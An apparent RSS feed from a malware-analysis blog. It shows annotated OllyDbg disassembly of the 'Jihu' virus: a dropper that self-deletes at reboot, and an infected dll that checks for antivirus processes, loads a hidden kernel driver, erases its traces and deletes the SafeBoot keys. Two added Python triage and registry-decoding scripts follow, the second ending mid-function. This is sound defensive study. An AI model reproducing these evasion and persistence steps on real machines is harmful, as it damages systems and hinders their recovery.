00401990  |. |5F            ||pop     edi<br />
00401991  |&gt; |56            ||push    esi                            ; /String<br />
00401992  |. |FF15 34104000 ||call    dword ptr [&lt;&amp;KERNEL32.lstrlenA&gt;; \lstrlenA<br />
00401998  |. |385C06 01     ||cmp     byte ptr [esi+eax+1], bl<br />
0040199C  |. |8D7406 01     ||lea     esi, dword ptr [esi+eax+1]<br />
004019A0  |.^|75 80         |\jnz     short 00401922<br />
004019A2  |. |3BFB          |cmp     edi, ebx<br />
004019A4  |. |75 10         |jnz     short 004019B6<br />
004019A6  |&gt; |68 20BF0200   |push    2BF20                           ; /Timeout = 180000. ms<br />
004019AB  |. |FF15 44104000 |call    dword ptr [&lt;&amp;KERNEL32.Sleep&gt;]   ; \Sleep<br />
004019B1  |.^\E9 41FFFFFF   \jmp     004018F7<br />
004019B6  |&gt;  FF35 20294000 push    dword ptr [402920]<br />
004019BC  |.  E8 4D000000   call    &lt;jmp.&amp;MSVCRT.operator delete&gt;<br />
004019C1  |.  55            push    ebp<br />
004019C2  |.  E8 F9F7FFFF   call    004011C0<br />
004019C7  |.  59            pop     ecx<br />
004019C8  |.  85C0          test    eax, eax<br />
004019CA  |.  59            pop     ecx<br />
004019CB  |.  75 07         jnz     short 004019D4<br />
004019CD  |.  E8 16FBFFFF   call    004014E8<br />
004019D2  |.  EB 0E         jmp     short 004019E2<br />
004019D4  |&gt;  6A 04         push    4                                ; /Flags = DELAY_UNTIL_REBOOT<br />
004019D6  |.  8D4424 34     lea     eax, dword ptr [esp+34]          ; |<br />
004019DA  |.  53            push    ebx                              ; |NewName<br />
004019DB  |.  50            push    eax                              ; |ExistingName<br />
004019DC  |.  FF15 14104000 call    dword ptr [&lt;&amp;KERNEL32.MoveFileEx&gt;; \MoveFileExA<br />
004019E2  |&gt;  53            push    ebx                              ; /status = 0; the MoveFileExA above (NewName = NULL, MOVEFILE_DELAY_UNTIL_REBOOT) deletes this exe at the next reboot, not now<br />
004019E3  |.  FF15 7C104000 call    dword ptr [&lt;&amp;MSVCRT.exit&gt;]       ; \exit<br />
004019E9  |.  CC            int3                                     ;  exit</p>
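<p>The last thing the exe does (004019D4 to 004019E3) is MoveFileExA(own path, NULL, MOVEFILE_DELAY_UNTIL_REBOOT) followed by exit. Nothing is deleted at that moment: the call records a (source, empty destination) pair in HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\PendingFileRenameOperations, and the Session Manager (smss.exe) carries the deletion out during the next boot. So until the reboot the dropper is still on disk, and afterwards that registry value is where the evidence of the self-removal sits, on a live host or in an offline SYSTEM hive. The decoder below is an added example, not code from the post; the REG_MULTI_SZ buffer it parses is constructed in the script and the paths in it are invented.</p>

```python
"""Decode PendingFileRenameOperations, where a MOVEFILE_DELAY_UNTIL_REBOOT self-delete ends up.
Added example for this page (not the author's code): the registry buffer below is constructed
here and the paths in it are invented for illustration.
"""
from typing import List

NT_PREFIX = "\\??\\"   # MoveFileEx stores Win32 paths in NT form: \??\C:\dir\file


def split_multi_sz(raw: bytes) -> List[str]:
    """Split a UTF-16LE REG_MULTI_SZ buffer into its strings.

    Do not stop at the first empty string, as a generic REG_MULTI_SZ reader would:
    in this value an empty string is a legitimate element (destination = delete).
    Only the final empty string, the list terminator, is dropped.
    """
    text = raw.decode("utf-16-le")
    items, pos = [], 0
    while pos < len(text):
        end = text.find("\0", pos)
        if end < 0:                       # tolerate a buffer missing its last NUL
            end = len(text)
        items.append(text[pos:end])
        pos = end + 1
    if items and items[-1] == "":
        items.pop()                       # list terminator
    return items


def pending_ops(raw: bytes) -> List[dict]:
    """Return the (source, destination) pairs as delete / rename / replace operations."""
    items = split_multi_sz(raw)
    if len(items) % 2:
        raise ValueError("expected (source, destination) pairs, got %d strings" % len(items))
    ops = []
    for src, dst in zip(items[::2], items[1::2]):
        replace = dst.startswith("!")     # MOVEFILE_REPLACE_EXISTING is recorded as a leading '!'
        dst = dst[1:] if replace else dst
        action = "delete" if dst == "" else ("replace" if replace else "rename")
        ops.append({"source": _win32(src), "destination": _win32(dst), "action": action})
    return ops


def _win32(path: str) -> str:
    """Turn the stored NT path back into the Win32 path the user would recognise."""
    return path[len(NT_PREFIX):] if path.startswith(NT_PREFIX) else path


def multi_sz(*strings: str) -> bytes:
    """Encode strings the way the registry stores REG_MULTI_SZ: each NUL-terminated, plus a final NUL."""
    return ("".join(s + "\0" for s in strings) + "\0").encode("utf-16-le")


# Constructed sample: the value after a dropper like the one above scheduled its own removal
# (path invented) and some installer queued a replace-on-reboot of a dll.
SAMPLE_VALUE = multi_sz(
    r"\??\C:\Documents and Settings\user\Desktop\dropper.exe", "",
    r"\??\C:\WINDOWS\Temp\new.dll", r"!\??\C:\WINDOWS\system32\old.dll",
)

if __name__ == "__main__":
    for op in pending_ops(SAMPLE_VALUE):
        print("%-8s %s%s" % (op["action"], op["source"], " -> " + op["destination"] if op["destination"] else ""))
```

On a live machine the same buffer is what the registry API hands back for that value; in an offline hive any REG_MULTI_SZ-capable hive parser gives the same bytes. A "delete" entry whose source is a user-writable path (a profile directory, %TEMP%) rather than an installer's target is the pattern to look for.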
]]></content:encoded>
			<wfw:commentRss>http://www.lingdux.com/2010/223.html/feed</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>极虎 (Jihu) virus sample analysis, part 2</title>
		<link>http://www.lingdux.com/2010/216.html</link>
		<comments>http://www.lingdux.com/2010/216.html#comments</comments>
		<pubDate>Fri, 18 Jun 2010 19:12:47 +0000</pubDate>
		<dc:creator>零度x</dc:creator>
				<category><![CDATA[Virus analysis]]></category>
		<category><![CDATA[Analysis]]></category>
		<category><![CDATA[极虎 (Jihu)]]></category>
		<category><![CDATA[Sample]]></category>
		<category><![CDATA[Virus]]></category>

		<guid isPermaLink="false">http://www.lingdux.com/?p=216</guid>
		<description><![CDATA[Continuing from the previous analysis: the infected dll.

00871B9A  |.  6A 1C         push    1C                               ; /BufSize = 1C (28.)

<span class="readmore"><a href="http://www.lingdux.com/2010/216.html" title="极虎 (Jihu) virus sample analysis, part 2">Read the full post (25054 characters)</a></span>]]></description>
			<content:encoded><![CDATA[<p>继续上一次分析感染的dll</p>
<pre class="brush: plain; title: ; notranslate">
00871B9A  |.  6A 1C         push    1C                               ; /BufSize = 1C (28.)
00871B9C  |.  8D45 E4       lea     eax, dword ptr [ebp-1C]          ; |
00871B9F  |.  50            push    eax                              ; |Buffer
00871BA0  |.  FF75 E0       push    dword ptr [ebp-20]               ; |Address
00871BA3  |.  FF15 2C918700 call    dword ptr [&lt;&amp;KERNEL32.VirtualQue&gt;; \VirtualQuery
00871BA9  |.  8B45 E8       mov     eax, dword ptr [ebp-18]          ;  VirtualQuery: [ebp-18] is MEMORY_BASIC_INFORMATION.AllocationBase of the queried address
00871BAC  |.  A3 38DC8700   mov     dword ptr [87DC38], eax
00871BB1  |.  6A 00         push    0                                ; /pModule = NULL
00871BB3  |.  FF15 04918700 call    dword ptr [&lt;&amp;KERNEL32.GetModuleH&gt;; \GetModuleHandleA
00871BB9  |.  3B05 38DC8700 cmp     eax, dword ptr [87DC38]          ;  GetModuleHandle(NULL): base of the process's main module
00871BBF  |.  75 16         jnz     short 00871BD7                   ;  compare the two: equal means this code is the main module, so run the loader functionality; not equal (running as the infected dll) starts...

008758E2  |.  6A 00         push    0                                ; /pThreadId = NULL
008758E4  |.  6A 00         push    0                                ; |CreationFlags = 0
008758E6  |.  6A 00         push    0                                ; |pThreadParm = NULL
008758E8  |.  68 9D538700   push    0087539D                         ; |ThreadFunction = appmgmts.0087539D
008758ED  |.  6A 00         push    0                                ; |StackSize = 0
008758EF  |.  6A 00         push    0                                ; |pSecurity = NULL
008758F1  |.  FF15 80918700 call    dword ptr [&lt;&amp;KERNEL32.CreateThre&gt;; \CreateThread
008758F7  |&gt;  33C0          xor     eax, eax                         ;  start thread A
</pre>
<p><span id="more-216"></span><br />
Thread A:<br />
Looks for Kaspersky and Defender processes and, if they are running, tries to evade them; then loads a driver the standard way (CreateServiceA with SERVICE_KERNEL_DRIVER, StartServiceA), deletes the driver file and its service key once it has run, deletes the SafeBoot registry keys so the machine can no longer boot into Safe Mode, and finally creates six threads.</p>
<pre class="brush: plain; title: ; notranslate">
00871681  |&gt; \6A 00         push    0                                ; /hTemplateFile = NULL
00871683  |.  68 80000000   push    80                               ; |Attributes = NORMAL
00871688  |.  FFB5 E8FEFFFF push    dword ptr [ebp-118]              ; |Mode
0087168E  |.  6A 00         push    0                                ; |pSecurity = NULL
00871690  |.  6A 03         push    3                                ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
00871692  |.  68 000000C0   push    C0000000                         ; |Access = GENERIC_READ|GENERIC_WRITE
00871697  |.  68 08938700   push    00879308                         ; |FileName = &quot;C:\DelInfo.bin&quot;
0087169C  |.  FF15 C4908700 call    dword ptr [&lt;&amp;KERNEL32.CreateFile&gt;; \CreateFileA
008716A2  |.  8985 ECFEFFFF mov     dword ptr [ebp-114], eax         ;  open C:\DelInfo.bin
008717BA  |.  6A 00         push    0                                ; /pOverlapped = NULL
008717BC  |.  8D45 FC       lea     eax, dword ptr [ebp-4]           ; |
008717BF  |.  50            push    eax                              ; |pBytesRead
008717C0  |.  68 04010000   push    104                              ; |BytesToRead = 104 (260.)
008717C5  |.  8D85 F0FEFFFF lea     eax, dword ptr [ebp-110]         ; |
008717CB  |.  50            push    eax                              ; |Buffer
008717CC  |.  FFB5 ECFEFFFF push    dword ptr [ebp-114]              ; |hFile
008717D2  |.  FF15 EC908700 call    dword ptr [&lt;&amp;KERNEL32.ReadFile&gt;] ; \ReadFile
008717D8  |.  FFB5 ECFEFFFF push    dword ptr [ebp-114]              ; /read the file
008717DE  |.  FF15 10918700 call    dword ptr [&lt;&amp;KERNEL32.CloseHandl&gt;; \CloseHandle
00871812  |.  50            |push    eax                             ; /FileName
00871813  |.  FF15 18918700 |call    dword ptr [&lt;&amp;KERNEL32.DeleteFil&gt;; \DeleteFileA
00871819  |.  83F8 01       |cmp     eax, 1                          ;  delete the previous loader
0087182A  |&gt; \68 08938700   push    00879308                         ; /FileName = &quot;C:\DelInfo.bin&quot;
0087182F  |.  FF15 18918700 call    dword ptr [&lt;&amp;KERNEL32.DeleteFile&gt;; \DeleteFileA
00871835  |.  8B85 F0FEFFFF mov     eax, dword ptr [ebp-110]         ;  delete C:\DelInfo.bin
00871125  |.  6A 00         push    0                                ; /ProcessID = 0
00871127  |.  6A 02         push    2                                ; |Flags = TH32CS_SNAPPROCESS
00871129  |.  E8 627D0000   call    &lt;jmp.&amp;KERNEL32.CreateToolhelp32S&gt;; \CreateToolhelp32Snapshot
0087112E  |.  8985 D0FEFFFF mov     dword ptr [ebp-130], eax
00871134  |.  8D85 D8FEFFFF lea     eax, dword ptr [ebp-128]
0087113A  |.  50            push    eax                              ; /lppe
0087113B  |.  FFB5 D0FEFFFF push    dword ptr [ebp-130]              ; |hSnapshot
00871141  |.  E8 3E7D0000   call    &lt;jmp.&amp;KERNEL32.Process32First&gt;   ; \Process32First
00871146  |&gt;  FF75 08       /push    dword ptr [ebp+8]               ; /String2
00871149  |.  8D85 FCFEFFFF |lea     eax, dword ptr [ebp-104]        ; |
0087114F  |.  50            |push    eax                             ; |String1
00871150  |.  FF15 F0908700 |call    dword ptr [&lt;&amp;KERNEL32.lstrcmpiA&gt;; \lstrcmpiA
00871156  |.  85C0          |test    eax, eax                        ;  look for Kaspersky and Defender process names
00871158  |.  75 0E         |jnz     short 00871168
0087115A  |.  8B85 E0FEFFFF |mov     eax, dword ptr [ebp-120]
00871160  |.  8985 D4FEFFFF |mov     dword ptr [ebp-12C], eax
00871166  |.  EB 16         |jmp     short 0087117E
00871168  |&gt;  8D85 D8FEFFFF |lea     eax, dword ptr [ebp-128]
0087116E  |.  50            |push    eax                             ; /lppe
0087116F  |.  FFB5 D0FEFFFF |push    dword ptr [ebp-130]             ; |hSnapshot
00871175  |.  E8 107D0000   |call    &lt;jmp.&amp;KERNEL32.Process32Next&gt;   ; \Process32Next
0087117A  |.  85C0          |test    eax, eax
0087117C  |.^ 75 C8         \jnz     short 00871146
0087117E  |&gt;  FFB5 D0FEFFFF push    dword ptr [ebp-130]              ; /hObject
00871184  |.  FF15 10918700 call    dword ptr [&lt;&amp;KERNEL32.CloseHandl&gt;; \CloseHandle
008754D7   .  68 18D48700   push    0087D418                         ; /Buffer = appmgmts.0087D418
008754DC   .  68 04010000   push    104                              ; |BufSize = 104 (260.)
008754E1   .  FF15 4C918700 call    dword ptr [&lt;&amp;KERNEL32.GetTempPat&gt;; \GetTempPathA
008754E7   .  68 04010000   push    104                              ; /get the temp directory
008754FB   .  68 04010000   push    104                              ; /BufSize = 104 (260.)
00875500   .  68 20D58700   push    0087D520                         ; |Buffer = appmgmts.0087D520
00875505   .  FF15 B0908700 call    dword ptr [&lt;&amp;KERNEL32.GetSystemD&gt;; \GetSystemDirectoryA
0087550B   .  68 04010000   push    104                              ; /get the system directory
00871536   .  50            push    eax                              ; /ProcNameOrOrdinal = &quot;LoadResource&quot;
00871537   .  68 F0928700   push    008792F0                         ; |/pModule = &quot;kernel32.dll&quot;
0087153C   .  FF15 04918700 call    dword ptr [&lt;&amp;KERNEL32.GetModuleH&gt;; |\GetModuleHandleA
00871542   .  50            push    eax                              ; |hModule
00871543   .  FF15 F4908700 call    dword ptr [&lt;&amp;KERNEL32.GetProcAdd&gt;; \GetProcAddress
00871549   .  8945 F8       mov     dword ptr [ebp-8], eax           ;  LoadResource address, resolved by name at run time
0087154C   .  68 00938700   push    00879300                         ; /ResourceType = &quot;FILE&quot;
00871551   .  0FB745 10     movzx   eax, word ptr [ebp+10]           ; |
00871555   .  50            push    eax                              ; |ResourceName
00871556   .  FF75 0C       push    dword ptr [ebp+C]                ; |hModule
00871559   .  FF15 C8908700 call    dword ptr [&lt;&amp;KERNEL32.FindResour&gt;; \FindResourceA
0087155F   .  8945 E0       mov     dword ptr [ebp-20], eax          ;  find the resource
00871562   .  FF75 E0       push    dword ptr [ebp-20]               ; /hResource
00871565   .  FF75 0C       push    dword ptr [ebp+C]                ; |hModule
00871568   .  FF15 E8908700 call    dword ptr [&lt;&amp;KERNEL32.SizeofReso&gt;; \SizeofResource
0087156E   .  8945 FC       mov     dword ptr [ebp-4], eax           ;  resource size
00871571   .  FF75 E0       push    dword ptr [ebp-20]
00871574   .  FF75 0C       push    dword ptr [ebp+C]
00871577   .  FF55 F8       call    dword ptr [ebp-8]                ;  kernel32.LoadResource
0087157A   .  8945 BC       mov     dword ptr [ebp-44], eax          ;  load the resource
008715D3   .  6A 00         push    0                                ; /hTemplateFile = NULL
008715D5   .  FF75 14       push    dword ptr [ebp+14]               ; |Attributes
008715D8   .  6A 02         push    2                                ; |Mode = CREATE_ALWAYS
008715DA   .  6A 00         push    0                                ; |pSecurity = NULL
008715DC   .  6A 03         push    3                                ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
008715DE   .  68 000000C0   push    C0000000                         ; |Access = GENERIC_READ|GENERIC_WRITE
008715E3   .  FF75 08       push    dword ptr [ebp+8]                ; |FileName = &quot;C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Forter.sys&quot;
008715E6   .  FF15 C4908700 call    dword ptr [&lt;&amp;KERNEL32.CreateFile&gt;; \CreateFileA
008715EC   .  8945 E8       mov     dword ptr [ebp-18], eax          ;  create C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Forter.sys
0087533A  |.  68 3F000F00   push    0F003F                           ; /DesiredAccess = SC_MANAGER_ALL_ACCESS
0087533F  |.  6A 00         push    0                                ; |DatabaseName = NULL
00875341  |.  6A 00         push    0                                ; |MachineName = NULL
00875343  |.  FF15 18908700 call    dword ptr [&lt;&amp;ADVAPI32.OpenSCMana&gt;;  advapi32.OpenSCManagerA
00875349  |.  8945 FC       mov     dword ptr [ebp-4], eax           ;  open the SCM
0087534C  |.  6A 00         push    0                                ; /Password = NULL
0087534E  |.  6A 00         push    0                                ; |ServiceStartName = NULL
00875350  |.  6A 00         push    0                                ; |pDependencies = NULL
00875352  |.  6A 00         push    0                                ; |pTagId = NULL
00875354  |.  6A 00         push    0                                ; |LoadOrderGroup = NULL
00875356  |.  FF75 08       push    dword ptr [ebp+8]                ; |BinaryPathName
00875359  |.  6A 01         push    1                                ; |ErrorControl = SERVICE_ERROR_NORMAL
0087535B  |.  6A 03         push    3                                ; |StartType = SERVICE_DEMAND_START
0087535D  |.  6A 01         push    1                                ; |ServiceType = SERVICE_KERNEL_DRIVER
0087535F  |.  68 FF010F00   push    0F01FF                           ; |DesiredAccess = SERVICE_ALL_ACCESS
00875364  |.  68 44988700   push    00879844                         ; |DisplayName = &quot;Forter&quot;
00875369  |.  68 44988700   push    00879844                         ; |ServiceName = &quot;Forter&quot;
0087536E  |.  FF75 FC       push    dword ptr [ebp-4]                ; |hManager
00875371  |.  FF15 20908700 call    dword ptr [&lt;&amp;ADVAPI32.CreateServ&gt;; \CreateServiceA
00875377  |.  8945 F8       mov     dword ptr [ebp-8], eax           ;  create the service
0087537A  |.  6A 00         push    0                                ; /ServiceArgVectors = NULL
0087537C  |.  6A 00         push    0                                ; |NumServiceArgs = 0
0087537E  |.  FF75 F8       push    dword ptr [ebp-8]                ; |hService
00875381  |.  FF15 24908700 call    dword ptr [&lt;&amp;ADVAPI32.StartServi&gt;;  advapi32.StartServiceA
00875387  |.  FF75 F8       push    dword ptr [ebp-8]                ;  load the driver the standard way (StartService on a SERVICE_KERNEL_DRIVER)
0087538A  |.  FF15 00908700 call    dword ptr [&lt;&amp;ADVAPI32.CloseServi&gt;;  advapi32.CloseServiceHandle
00875390  |.  FF75 FC       push    dword ptr [ebp-4]
00875393  |.  FF15 00908700 call    dword ptr [&lt;&amp;ADVAPI32.CloseServi&gt;;  advapi32.CloseServiceHandle
0087559E   .  50            push    eax
0087559F   .  68 02000080   push    80000002
008755A4   .  FF95 D0F6FFFF call    dword ptr [ebp-930]              ;  shlwapi.SHDeleteKeyA
008755AA   .  8D85 C0F4FFFF lea     eax, dword ptr [ebp-B40]         ;  delete the service's subkey under SYSTEM\CurrentControlSet\Services
008755B0   .  50            push    eax                              ; /FileName
008755B1   .  FF15 18918700 call    dword ptr [&lt;&amp;KERNEL32.DeleteFile&gt;; \DeleteFileA
008755B7   .  68 04010000   push    104                              ; /delete C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Forter.sys
00871AA0  |.  50            push    eax                              ; /pHandle
00871AA1  |.  68 1F000200   push    2001F                            ; |Access = KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|20000
00871AA6  |.  6A 00         push    0                                ; |Reserved = 0
00871AA8  |.  8D85 78FBFFFF lea     eax, dword ptr [ebp-488]         ; |
00871AAE  |.  50            push    eax                              ; |Subkey
00871AAF  |.  68 02000080   push    80000002                         ; |hKey = HKEY_LOCAL_MACHINE
00871AB4  |.  FF15 0C908700 call    dword ptr [&lt;&amp;ADVAPI32.RegOpenKey&gt;; \RegOpenKeyExA
00871ABA  |.  6A 04         push    4                                ; /open SYSTEM\CurrentControlSet\Services\LOADDLL (named after the host exe, here OllyDbg's LOADDLL.EXE)
00871ABC  |.  8D45 10       lea     eax, dword ptr [ebp+10]          ; |
00871ABF  |.  50            push    eax                              ; |Buffer
00871AC0  |.  6A 04         push    4                                ; |ValueType = REG_DWORD
00871AC2  |.  6A 00         push    0                                ; |Reserved = 0
00871AC4  |.  68 80948700   push    00879480                         ; |ValueName = &quot;Start&quot;
00871AC9  |.  FF75 BC       push    dword ptr [ebp-44]               ; |hKey
00871ACC  |.  FF15 08908700 call    dword ptr [&lt;&amp;ADVAPI32.RegSetValu&gt;; \RegSetValueExA
00871AD2  |.  FF75 BC       push    dword ptr [ebp-44]               ; /set Start = 2 (SERVICE_AUTO_START)
00871AD5  |.  FF15 10908700 call    dword ptr [&lt;&amp;ADVAPI32.RegCloseKe&gt;; \RegCloseKey
0087586E   &gt; \6A 00         push    0                                ; /pThreadId = NULL
00875870   .  6A 00         push    0                                ; |CreationFlags = 0
00875872   .  6A 00         push    0                                ; |pThreadParm = NULL
00875874   .  68 63518700   push    00875163                         ; |ThreadFunction = appmgmts.00875163
00875879   .  6A 00         push    0                                ; |StackSize = 0
0087587B   .  6A 00         push    0                                ; |pSecurity = NULL
0087587D   .  FF15 80918700 call    dword ptr [&lt;&amp;KERNEL32.CreateThre&gt;; \CreateThread
00875883   .  6A 00         push    0                                ; /create thread A1
00875885   .  6A 00         push    0                                ; |CreationFlags = 0
00875887   .  6A 00         push    0                                ; |pThreadParm = NULL
00875889   .  68 4A378700   push    0087374A                         ; |ThreadFunction = appmgmts.0087374A
0087588E   .  6A 00         push    0                                ; |StackSize = 0
00875890   .  6A 00         push    0                                ; |pSecurity = NULL
00875892   .  FF15 80918700 call    dword ptr [&lt;&amp;KERNEL32.CreateThre&gt;; \CreateThread
00875898   .  8D85 D8FEFFFF lea     eax, dword ptr [ebp-128]         ;  create thread A2
0087694E  |.  6A 00         push    0                                ; /pThreadId = NULL
00876950  |.  6A 00         push    0                                ; |CreationFlags = 0
00876952  |.  6A 00         push    0                                ; |pThreadParm = NULL
00876954  |.  68 AB8C8700   push    00878CAB                         ; |ThreadFunction = appmgmts.00878CAB
00876959  |.  6A 00         push    0                                ; |StackSize = 0
0087695B  |.  6A 00         push    0                                ; |pSecurity = NULL
0087695D  |.  FF15 80918700 call    dword ptr [&lt;&amp;KERNEL32.CreateThre&gt;; \CreateThread
00876963  |.  68 409B8700   push    00879B40                         ; /create thread A3
00876968  |.  68 02000080   push    80000002                         ; |hKey = HKEY_LOCAL_MACHINE
0087696D  |.  FF15 F4918700 call    dword ptr [&lt;&amp;SHLWAPI.SHDeleteKey&gt;; \SHDeleteKeyA
00876973  |.  68 749B8700   push    00879B74                         ; /SubKey = &quot;SYSTEM\CurrentControlSet\Control\SafeBoot\Network&quot;
00876978  |.  68 02000080   push    80000002                         ; |hKey = HKEY_LOCAL_MACHINE
0087697D  |.  FF15 F4918700 call    dword ptr [&lt;&amp;SHLWAPI.SHDeleteKey&gt;; \SHDeleteKeyA
00876983  |.  833D 50B58700&gt;cmp     dword ptr [87B550], -1           ;  delete the SafeBoot keys (Safe Mode no longer boots)
00871C0B  |.  68 04010000   push    104                              ; /BufSize = 104 (260.)
00871C10  |.  8D85 E8FEFFFF lea     eax, dword ptr [ebp-118]         ; |
00871C16  |.  50            push    eax                              ; |PathBuffer
00871C17  |.  FF75 08       push    dword ptr [ebp+8]                ; |hModule
00871C1A  |.  FF15 00918700 call    dword ptr [&lt;&amp;KERNEL32.GetModuleF&gt;; \GetModuleFileNameA
00871C20  |.  83A5 E0FEFFFF&gt;and     dword ptr [ebp-120], 0           ;  path of the exe that loaded this dll
00871C3F  |.  6A 00         |push    0                               ; /hTemplateFile = NULL
00871C41  |.  6A 00         |push    0                               ; |Attributes = 0
00871C43  |.  6A 03         |push    3                               ; |Mode = OPEN_EXISTING
00871C45  |.  6A 00         |push    0                               ; |pSecurity = NULL
00871C47  |.  6A 01         |push    1                               ; |ShareMode = FILE_SHARE_READ
00871C49  |.  68 00000080   |push    80000000                        ; |Access = GENERIC_READ
00871C4E  |.  8D85 E8FEFFFF |lea     eax, dword ptr [ebp-118]        ; |
00871C54  |.  50            |push    eax                             ; |FileName = &quot;C:\tools\OllyICE\LOADDLL.EXE&quot;
00871C55  |.  FF15 C4908700 |call    dword ptr [&lt;&amp;KERNEL32.CreateFil&gt;; \CreateFileA
00871C5B  |.  8945 F4       |mov     dword ptr [ebp-C], eax          ;  open the exe
00871C70  |&gt; \6A 00         push    0                                ; /pFileSizeHigh = NULL
00871C72  |.  FF75 F4       push    dword ptr [ebp-C]                ; |hFile
00871C75  |.  FF15 24918700 call    dword ptr [&lt;&amp;KERNEL32.GetFileSiz&gt;; \GetFileSize
00871C7B  |.  8945 F8       mov     dword ptr [ebp-8], eax           ;  file size
00871CEF  |.  6A 00         push    0                                ; /pOverlapped = NULL
00871CF1  |.  8D45 FC       lea     eax, dword ptr [ebp-4]           ; |
00871CF4  |.  50            push    eax                              ; |pBytesRead
00871CF5  |.  FF75 F8       push    dword ptr [ebp-8]                ; |BytesToRead
00871CF8  |.  FFB5 E4FEFFFF push    dword ptr [ebp-11C]              ; |Buffer
00871CFE  |.  FF75 F4       push    dword ptr [ebp-C]                ; |hFile
00871D01  |.  FF15 EC908700 call    dword ptr [&lt;&amp;KERNEL32.ReadFile&gt;] ; \ReadFile
00871D07  |.  FF75 F4       push    dword ptr [ebp-C]                ; /read the file
00876B05  |.  6A 00         push    0
00876B07  |.  6A 00         push    0
00876B09  |.  6A 00         push    0
00876B0B  |.  68 24638700   push    00876324
00876B10  |.  6A 00         push    0
00876B12  |.  6A 00         push    0
00876B14  |.  FF55 FC       call    dword ptr [ebp-4]                ;  kernel32.CreateThread
00876B17  |&gt;  833D 84C68700&gt;cmp     dword ptr [87C684], 0            ;  create thread A4
00876B20  |.  6A 00         push    0
00876B22  |.  6A 00         push    0
00876B24  |.  6A 00         push    0
00876B26  |.  68 988A8700   push    00878A98
00876B2B  |.  6A 00         push    0
00876B2D  |.  6A 00         push    0
00876B2F  |.  FF55 FC       call    dword ptr [ebp-4]                ;  kernel32.CreateThread
00876B32  |&gt;  833D 88C68700&gt;cmp     dword ptr [87C688], 0            ;  create thread A5
00876B3B  |.  6A 00         push    0
00876B3D  |.  6A 00         push    0
00876B3F  |.  6A 01         push    1
00876B41  |.  68 DC858700   push    008785DC
00876B46  |.  6A 00         push    0
00876B48  |.  6A 00         push    0
00876B4A  |.  FF55 FC       call    dword ptr [ebp-4]                ;  kernel32.CreateThread
00876B4D  |&gt;  833D 8CC68700&gt;cmp     dword ptr [87C68C], 0            ;  create thread A6
</pre>
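<p>The posts on this page turn OllyDbg listings into a behaviour summary by hand: which imports are called, which strings and paths are pushed, what the combination means. As an added example (not the author's code), the script below does that first pass mechanically. It expects listing text as copied out of OllyDbg, with the literal <code>[&lt;&amp;MODULE.Func&gt;]</code> import stubs and the <code>; \Func</code> / <code>; module.Func</code> comments the debugger appends (this feed shows those characters HTML-escaped, so paste from the debugger, not from the page). The sample it ships with is a handful of lines lifted from the listings above, with two hand-written comments replaced by the bare pipe name and URL so the unquoted-IOC path is exercised; the behaviour labels are the script's own vocabulary, not anything the page states.</p>

```python
"""Triage an OllyDbg listing: imports called, strings pushed, behaviours implied.
Added example for this page (not the author's code). Input is listing text as copied
from OllyDbg, with the literal [<&MODULE.Func>] stubs and "; \Func" comments it appends.
"""
import re
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

ADDR_RE = re.compile(r"^[0-9A-Fa-f]{8}\s")                 # listing lines start with an 8-digit address
IMPORT_RE = re.compile(r"<(?:jmp\.)?&(\w+)\.([^>]+)>")      # [<&KERNEL32.CreateFile>  /  <jmp.&MSVCRT.free>
RESOLVED_RE = re.compile(r"^\s*[|/]*\\([A-Za-z_]\w*)")       # "; \CreateFileA": full name, never truncated
MODFUNC_RE = re.compile(r"\b([a-z0-9_]+)\.([A-Za-z_]\w*)")  # "; kernel32.LoadResource" on calls via a saved pointer
QUOTED_RE = re.compile(r'"([^"]*)"')                        # FileName = "C:\DelInfo.bin", ASCII "www.baidu.com"
BARE_RE = re.compile(r"https?://\S+|\\\\\.\\pipe\\\S+")     # URLs and pipe names left unquoted in comments
FILE_EXT = (".exe", ".dll", ".sys", ".bin", ".tmp", ".ocx")

API_TAGS = {  # coarse behaviour labels per API: the script's own vocabulary, not the page's
    "CreateServiceA": "installs a service/driver via the SCM",
    "StartServiceA": "starts a service/driver via the SCM",
    "CreateNamedPipeA": "opens a named-pipe command channel",
    "SHDeleteKeyA": "deletes registry keys",
    "MoveFileExA": "renames/deletes files (can be deferred to reboot)",
    "CreateToolhelp32Snapshot": "enumerates processes",
    "TerminateProcess": "kills processes",
    "CreateProcessA": "spawns processes",
}


def parse_call(instr: str, comment: str) -> Optional[Tuple[str, str]]:
    """(module, function) for a call line, else None. OllyDbg truncates long names inside
    the [<&...>] column (CreateServ, StartServi), so the trailing comment wins when present."""
    if not re.search(r"\bcall\b", instr):
        return None
    module = name = None
    m = IMPORT_RE.search(instr)
    if m:
        module, name = m.group(1).lower(), m.group(2)
    if m := RESOLVED_RE.search(comment):
        name = m.group(1)
    elif m := MODFUNC_RE.search(comment):
        module, name = m.groups()
    return (module or "?", name) if name else None


def extract_strings(comment: str) -> List[str]:
    """Quoted strings first, then bare URLs / pipe names outside the quotes."""
    found = QUOTED_RE.findall(comment)
    found += BARE_RE.findall(QUOTED_RE.sub(" ", comment))
    return [s for s in found if s]


def classify(s: str) -> str:
    """Bucket a string as url / pipe / file / registry / domain / other."""
    low = s.lower()
    if low.startswith(("http://", "https://")):
        return "url"
    if s.startswith("\\\\.\\pipe\\"):
        return "pipe"
    if re.match(r"[a-z]:\\", low) or low.endswith(FILE_EXT):
        return "file"                            # before "domain": kernel32.dll is not a host name
    if re.match(r"(?:hk[a-z_]+\\|system\\|software\\)", low):
        return "registry"
    if re.fullmatch(r"(?:[a-z0-9-]+\.)+[a-z]{2,}", low):
        return "domain"
    return "other"


def analyse(listing: str) -> Dict[str, dict]:
    """One pass over the listing: imports per module, IOCs per bucket, behaviour labels."""
    imports: Dict[str, set] = defaultdict(set)
    iocs: Dict[str, set] = defaultdict(set)
    for raw in listing.splitlines():
        line = raw.strip()
        if not ADDR_RE.match(line):
            continue                             # skip prose, blank lines, page chrome
        instr, _, comment = line.partition(";")
        if hit := parse_call(instr, comment):
            imports[hit[0]].add(hit[1])
        for s in extract_strings(comment):
            iocs[classify(s)].add(s)
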